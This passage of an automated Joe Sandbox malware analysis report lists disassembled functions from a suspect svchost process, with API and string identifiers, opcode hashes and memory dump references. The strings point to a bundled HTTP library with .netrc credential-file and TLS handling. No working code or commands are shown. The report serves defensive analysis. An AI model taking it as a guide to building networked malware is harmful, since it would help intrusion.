                          • Opcode ID: d1d2efe3144fd540e8b844986d91a203392935848b9aa5b6a4edd1debec56d5c
                          • Instruction ID: 84d9483225983b6aafcd852f3ce6ad7934d9cf66a8491bf977f15f8a99a684a0
                          • Opcode Fuzzy Hash: d1d2efe3144fd540e8b844986d91a203392935848b9aa5b6a4edd1debec56d5c
                          • Instruction Fuzzy Hash: A691606AB0EB8A85FB538F12D42437927A2EB86F90F884075DE4D0778ADF2DE441D714
                          Function 00007FFDA55C25E0 Relevance: 21.3, APIs: 17, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: f9054b6c41bdc7fa9427389a37a845b6d3b4069bf6a0d4c63a1f14707fe7c97c
                          • Instruction ID: 54c338c6e4544742cb285c8ea3a89ba21cd1d9f2c2fbc4a48f3a2ba879813784
                          • Opcode Fuzzy Hash: f9054b6c41bdc7fa9427389a37a845b6d3b4069bf6a0d4c63a1f14707fe7c97c
                          • Instruction Fuzzy Hash: 6D41A97E746B8596D74AAF25EA583A87374FB8AB50F040025DF5E43B518F78E0B88314
                          Function 00007FFDA5588618 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 254COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup$calloc
                          • String ID: application/octet-stream$k
                          • API String ID: 149330190-2522224428
                          • Opcode ID: b4796e396b2e293a4ccace64014af710773a9e3432854d8740da5a801c1e73df
                          • Instruction ID: a046309aa018e772a842fd14317bc63bc52dd520278014bf85907f29fea2e848
                          • Opcode Fuzzy Hash: b4796e396b2e293a4ccace64014af710773a9e3432854d8740da5a801c1e73df
                          • Instruction Fuzzy Hash: 31C16F7AB0AB4995EB6A8F15946033827A1EB46F58F5809B4CE9D077D6DF3CD880D308
                          Function 00007FFDA5588751 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 253COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup$calloc
                          • String ID: application/octet-stream$k
                          • API String ID: 149330190-2522224428
                          • Opcode ID: d101483a134b522a0ea622b3f50a4836e87d648b9c317e03f94f2a9bdb6adf2d
                          • Instruction ID: fc8f6cbd14024b1d27f190f04835174c2a6f998ad2c8226bbc13cfb1487ddc7a
                          • Opcode Fuzzy Hash: d101483a134b522a0ea622b3f50a4836e87d648b9c317e03f94f2a9bdb6adf2d
                          • Instruction Fuzzy Hash: 53C17F7AB0AB4995EB6A8F14946033827E1EB46F58F5809B4CE9D077D6DF3CD881D308
                          Function 00007FFDA55C3820 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 171COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup
                          • String ID: .netrc$.netrc parser error$Couldn't find host %s in the %s file; using defaults
                          • API String ID: 2653869212-330727394
                          • Opcode ID: bb9bc4a581c2346b4f44b96d6ddb7c3b6852138075e7cc7b28246d96a7e34392
                          • Instruction ID: 216a35437188437be83c7eea70d5ac3c24ee2f0d8f9d1f2d855103d285c96ea3
                          • Opcode Fuzzy Hash: bb9bc4a581c2346b4f44b96d6ddb7c3b6852138075e7cc7b28246d96a7e34392
                          • Instruction Fuzzy Hash: 0A71B439B0AA4E82EB568F15E8643BA23A0FB46F84F454031DE0D47B96DF3CE465C348
                          Function 00007FFDA55BE5DC Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 301COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: %lld$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$timeout$tsize
                          • API String ID: 1294909896-1106908834
                          • Opcode ID: b4e8e94a0679420947d9f8b60f768422988dec3105b4f9194979f87b37835e27
                          • Instruction ID: 82fedf4dbe9a2de69305f22e2f317fcf945cda5fbeb4c7e050786d94f7816572
                          • Opcode Fuzzy Hash: b4e8e94a0679420947d9f8b60f768422988dec3105b4f9194979f87b37835e27
                          • Instruction Fuzzy Hash: B0E1C67AB0AAC985EF12CF15D0683B967A1EB86F88F498131CA4D07796EF3CD545C314
                          Function 00007FFDA55C55A0 Relevance: 18.1, APIs: 12, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdup$callocfree
                          • String ID:
                          • API String ID: 1183638330-0
                          • Opcode ID: fe398f222f6f458957b536ce3e97e551d8fcd28a0f9202c922f1987917b49815
                          • Instruction ID: 2bb9e12cc156de35602037d28f2bda755f62bebef3827b8f60981c19c2b6aaa0
                          • Opcode Fuzzy Hash: fe398f222f6f458957b536ce3e97e551d8fcd28a0f9202c922f1987917b49815
                          • Instruction Fuzzy Hash: 0741FB3DB07B4682EE5B9FA5947473862A0AF59F45F080538DA0E03B56EF2CF4A48714
                          Function 00007FFDA55CD680 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 190encryptionCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: CertCertificateContextFree
                          • String ID: schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle$schannel: server selected an ALPN protocol too late
                          • API String ID: 3080675121-1264606989
                          • Opcode ID: 22cb0939f2f7ab55ceea28a973b259c41bfc03db7f43bf8292f96ba0f68afd33
                          • Instruction ID: a9ad990d6e08f9a539f3c30e55c4839f4335727c02d052c20ddac02dc07243f4
                          • Opcode Fuzzy Hash: 22cb0939f2f7ab55ceea28a973b259c41bfc03db7f43bf8292f96ba0f68afd33
                          • Instruction Fuzzy Hash: 6B81732AB0E6CA91EA52DF11A4603BA67A0EB86F80F445031DE4E47757DF3CE465CB44
                          Function 64945BE0 Relevance: 16.7, APIs: 11, Instructions: 151sleepCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Sleep$CreateEvent
                          • String ID:
                          • API String ID: 1576368186-0
                          • Opcode ID: 3a8f0e5f485a57a8fd7ad16dca34b9265d8dc5cd446898dcf4c0c6ed55fd24e3
                          • Instruction ID: 322aad4d60bda52f91d0dd0aacbc613f080a5a7f86a1d1e06db62ca80e90a9de
                          • Opcode Fuzzy Hash: 3a8f0e5f485a57a8fd7ad16dca34b9265d8dc5cd446898dcf4c0c6ed55fd24e3
                          • Instruction Fuzzy Hash: 2C519A3229165086EB158F75E80475E33A9FB89BBCF244325DE298B7D8DF39C886C350
                          Function 00007FFDA55885D7 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 229COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdup
                          • String ID: application/octet-stream$k
                          • API String ID: 1169197092-2522224428
                          • Opcode ID: 5e216d063a79c1f37cc5649c68b731997a2af77b9fe2912d6323005140ab9866
                          • Instruction ID: ab0f0e80bef98b7a65b27e3854e03d5dff5a19d16a6815702833ca5a00fe5a24
                          • Opcode Fuzzy Hash: 5e216d063a79c1f37cc5649c68b731997a2af77b9fe2912d6323005140ab9866
                          • Instruction Fuzzy Hash: F8B17E7AB0AB4995EB6A8F14946032827A1EB46F58F5849B4CE9D077D6DF3CD880D308
                          Function 00007FFDA5588809 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 225COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdup
                          • String ID: application/octet-stream$k
                          • API String ID: 1169197092-2522224428
                          • Opcode ID: bca073fe85238b138440d95cf7989cf78636fde8ad80831de9c8151113a11be0
                          • Instruction ID: 715f63d2c0ced7d114922f4f420dd6b4e00b6dab25c2633c29dd330e69531d3d
                          • Opcode Fuzzy Hash: bca073fe85238b138440d95cf7989cf78636fde8ad80831de9c8151113a11be0
                          • Instruction Fuzzy Hash: 3DA17E7AB0AB4995EB6A8F14D46032827E1EB46F58F5809B4CE9D077D6DF3CD881D308
                          Function 00007FFDA559572B Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 132COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: strchr$free
                          • String ID: HTTP/1.0 proxy connection set to keep alive$HTTP/1.1 proxy connection set close$Negotiate: noauthpersist -> %d, header part: %s$Persistent-Auth:$Proxy-Connection:$Proxy-authenticate:$close$false$keep-alive
                          • API String ID: 3578582447-3982183773
                          • Opcode ID: af64a45a60c776fa3ca57ea35a040d15094149ae1437f010b3d26d0ff6886d72
                          • Instruction ID: 76927e1bd858c8a1c2e2585cdd81437a679e71136889b7d930862c8c088283ad
                          • Opcode Fuzzy Hash: af64a45a60c776fa3ca57ea35a040d15094149ae1437f010b3d26d0ff6886d72
                          • Instruction Fuzzy Hash: E851986AF0E68AC5FA26EF16A9343F912A19F13F84F440035D90D067D7EF6CE551830A
                          Function 00007FFDA55CF820 Relevance: 15.0, APIs: 12, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: add0b55f31ea5315e63d18e07a67bae7d110dbd47902aebcef5392f5d948f21e
                          • Instruction ID: a14f8d48b23b407c0caef3e42c94915cf9a1de498c67eaa9080d39279b3d5208
                          • Opcode Fuzzy Hash: add0b55f31ea5315e63d18e07a67bae7d110dbd47902aebcef5392f5d948f21e
                          • Instruction Fuzzy Hash: 4721987E64AB05C2D702AF25E9A823C33B4FB8AF997100025DE4E43B59CF78D499C365
                          Function 00007FFDA5588503 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 236COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup
                          • String ID: application/octet-stream$k
                          • API String ID: 2653869212-2522224428
                          • Opcode ID: de1c18a33a8226ade4d38b042767e0601d4dd691b8d68a6b6e67acb496470743
                          • Instruction ID: bc5a2f5d76d55431d81231e2024b2136c390d974f270a1129d5d2259ab80d416
                          • Opcode Fuzzy Hash: de1c18a33a8226ade4d38b042767e0601d4dd691b8d68a6b6e67acb496470743
                          • Instruction Fuzzy Hash: 33B1607AB0AB4995EB6A8F15D46033827A1EB46F58F5809B4CE9D073D6DF3CE841D308
                          Function 00007FFDA5588563 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 234COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: application/octet-stream$k
                          • API String ID: 0-2522224428
                          • Opcode ID: 5d7c280c46b4d2e0b7470f727e2e430a54cf03afdcea3e54c162465bc49df8b1
                          • Instruction ID: db99003b55388fdbf73d16fb2b1f5252721bd39b253918d8be72362b8e694b49
                          • Opcode Fuzzy Hash: 5d7c280c46b4d2e0b7470f727e2e430a54cf03afdcea3e54c162465bc49df8b1
                          • Instruction Fuzzy Hash: BEB17F7AB0AB4995EB6A8F15946032827E1EB46F58F5809B4CE9D073D6DF3CD841D308
                          Function 00007FFDA55884E2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 231COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup
                          • String ID: application/octet-stream$k
                          • API String ID: 2653869212-2522224428
                          • Opcode ID: 7e9c4b969ef8d293e174c56025b9b73a82eff97ca4d88b718424fc2538e9700c
                          • Instruction ID: 0f710e4f64b94309f1682c5123cf6a78986ca9b8e8ed2602e6db9460691cb887
                          • Opcode Fuzzy Hash: 7e9c4b969ef8d293e174c56025b9b73a82eff97ca4d88b718424fc2538e9700c
                          • Instruction Fuzzy Hash: 63B16E7AB0AB4995EB6A8F15D46033927A1EB46F98F5809B4CE9C073D6DF3CD841D308
                          Function 00007FFDA5588726 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 222COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: application/octet-stream$k
                          • API String ID: 0-2522224428
                          • Opcode ID: ba0641887a76c748bcb6e38eaa71c167e20de8602d7cceee5f9270d3bdd708fa
                          • Instruction ID: 7350470a1cb77d7d89d41be09449eeb500adefba43f40e0233d63f9f9fc2afac
                          • Opcode Fuzzy Hash: ba0641887a76c748bcb6e38eaa71c167e20de8602d7cceee5f9270d3bdd708fa
                          • Instruction Fuzzy Hash: 4CA16E7AB0AB4995EB6A8F15946032827E1FB46F98F5809B4CE9D073D6DF3CD841D308
                          Function 00007FFDA55886CA Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 220COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: application/octet-stream$k
                          • API String ID: 0-2522224428
                          • Opcode ID: 3b37e7022defceadeff34084eb6a48a0daac0f8275bd3d1c27efead74be8efdc
                          • Instruction ID: 3f02b0d9e0c91225b734b32272870ef522805bae53ba3073e4348bcf9539a2fb
                          • Opcode Fuzzy Hash: 3b37e7022defceadeff34084eb6a48a0daac0f8275bd3d1c27efead74be8efdc
                          • Instruction Fuzzy Hash: 14A15E7AB0AB4995EB6A8F15946032823E1EB46F58F580AB4CE9D077D6DF3CD841D308
                          Function 00007FFDA55887E9 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 219COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
